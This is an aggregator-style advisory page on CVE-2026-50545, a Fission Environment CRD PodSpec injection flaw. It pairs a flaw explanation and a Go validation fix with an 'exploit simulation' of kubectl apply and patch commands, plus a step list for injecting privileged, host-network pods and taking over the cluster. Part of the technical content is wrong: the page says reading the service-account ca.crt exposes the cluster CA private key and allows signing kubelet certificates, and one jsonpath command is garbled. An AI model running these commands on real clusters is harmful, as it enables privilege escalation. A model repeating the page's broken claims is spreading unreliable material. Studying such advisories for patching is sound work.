Fission Environment CRD PodSpec Injection, CVE-2026-50545 (CRITICAL) -DC-Jun2026-753

Listen to this Post

How the CVE Works

Prior to Fission v1.24.0, the Environment Custom Resource Definition (CRD) exposed two passthrough fields—spec.runtime.podSpec and spec.builder.podSpec—which allowed users to supply arbitrary Kubernetes PodSpec configuration. This mechanism was intended to provide flexibility but lacked proper security validation, creating a critical attack vector.

The vulnerability stems from three compounding flaws:

  1. Validation Gap – The `Environment.Validate` function in `pkg/apis/core/v1/validation.go` only checked container naming conventions. It never validated dangerous pod-level fields such as hostPID, hostIPC, hostNetwork, `hostPath` volumes, or `privileged` containers. No security-relevant checks were performed on user-supplied PodSpec fields.
  2. UPDATE Bypass – The Kubernetes admission webhook in `pkg/webhook/environment.go` was registered with `verbs=create` only. A tenant could apply a clean Environment using kubectl apply, then issue a follow-up `kubectl patch` to inject dangerous fields—the webhook was never invoked for update operations, completely bypassing the admission control.
  3. Merge Propagation – The `MergePodSpec` function in `pkg/executor/util/merge.go` unconditionally forwarded HostPID, HostIPC, HostNetwork, `Volumes` (including hostPath), SecurityContext, and `ServiceAccountName` into the Deployments generated by poolmgr, newdeploy, and buildermgr. No filtering or sanitization was applied at the merge layer.
    A simple `kubectl apply` plus a follow-up `kubectl patch` caused poolmgr to schedule a privileged pod with a host-root mount within roughly 20 seconds. From that pod, the cluster CA private key was readable, allowing the attacker to sign arbitrary kubelet certificates and achieve full cluster takeover.
    The vulnerability affects all Fission installations prior to version 1.24.0 and carries a CVSS score of 9.9 (CRITICAL).

DailyCVE Form:

| Field | Value |

|-|-|

| Platform | Fission |

| Version | < 1.24.0 |

| Vulnerability | PodSpec Injection |

| Severity | CRITICAL (9.9) |

| Date | 2026-06-10 |

| Prediction | Already Patched v1.24.0 |

What Undercode Say:

Check current Fission version
kubectl get deployment -n fission fission-controller -o jsonpath='{.spec.template.spec.containers[bash].image}'
Verify Environment CRD allows podSpec passthrough
kubectl get crd environments.fission.io -o yaml | grep -A5 "podSpec"
Exploit simulation: create clean Environment then patch dangerous fields
cat <<EOF | kubectl apply -f -
apiVersion: fission.io/v1
kind: Environment
metadata:
name: vulnerable-env
namespace: default
spec:
runtime:
image: python:3.9
podSpec: {}
EOF
Patch in hostNetwork + privileged container (webhook bypassed on UPDATE)
kubectl patch environment vulnerable-env --type='json' -p='[{"op": "add", "path": "/spec/runtime/podSpec/hostNetwork", "value": true}]'
kubectl patch environment vulnerable-env --type='json' -p='[{"op": "add", "path": "/spec/runtime/podSpec/containers/0/securityContext/privileged", "value": true}]'
Result: poolmgr schedules privileged pod with hostNetwork within ~20s
kubectl get pods -n default -l environment=vulnerable-env
From the compromised pod, read cluster CA key
kubectl exec -it <pod-name> -n default -- cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

Code Fix (from 3391):

// pkg/apis/core/v1/podspec_safety.go - ValidatePodSpecSafety()
func ValidatePodSpecSafety(podSpec corev1.PodSpec) error {
if podSpec.HostNetwork || podSpec.HostPID || podSpec.HostIPC {
return fmt.Errorf("host namespaces are not allowed")
}
for _, vol := range podSpec.Volumes {
if vol.HostPath != nil {
return fmt.Errorf("hostPath volumes are not allowed")
}
}
for _, c := range podSpec.Containers {
if c.SecurityContext != nil {
if c.SecurityContext.Privileged != nil && c.SecurityContext.Privileged {
return fmt.Errorf("privileged containers are not allowed")
}
if c.SecurityContext.AllowPrivilegeEscalation != nil && c.SecurityContext.AllowPrivilegeEscalation {
return fmt.Errorf("allowPrivilegeEscalation is not allowed")
}
}
// Dangerous capabilities blocklist
}
if podSpec.ServiceAccountName != "" && podSpec.ServiceAccountName != "default" {
return fmt.Errorf("custom ServiceAccountName is not allowed")
}
return nil
}

Exploit:

An authenticated user with `environments.fission.io` create/update RBAC permissions can:
1. Create a benign Environment with an empty `podSpec`
2. Issue a `kubectl patch` to inject hostNetwork: true, hostPID: true, or `securityContext.privileged: true`
3. The UPDATE webhook is never called (verbs=create only), allowing the patch to succeed
4. `MergePodSpec` propagates all dangerous fields into the generated Deployment
5. poolmgr schedules a privileged pod with host namespace access within ~20 seconds
6. From the pod, read `/var/run/secrets/kubernetes.io/serviceaccount/ca.crt` to obtain the cluster CA
7. Sign arbitrary kubelet certificates and achieve full cluster takeover
Attack Vector: Network, Privileges Required: Low, User Interaction: None

Protection:

  • Upgrade to Fission v1.24.0 or later immediately
  • If upgrade is not possible, restrict `environments.fission.io` create/update permissions to trusted administrators only
  • Deploy admission controllers or OPA policies that reject PodSpec fields with hostNetwork, hostPID, hostIPC, hostPath, or `privileged: true`
    – Implement network policies to limit pod communication
  • Audit existing Environment configurations for suspicious podSpec entries introduced before patching
  • Monitor for unauthorized modifications to Environment CRDs

Impact:

  • Node escape via privileged container with host namespace access
  • Cluster CA private key exposure – readable from the compromised pod
  • Full cluster takeover – attacker can sign arbitrary kubelet certificates
  • Lateral movement within the Kubernetes environment
  • Data exfiltration and persistent access
  • CVSS 9.9 (CRITICAL) – Scope: Changed, Impact: High on all three pillars (Confidentiality, Integrity, Availability)

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top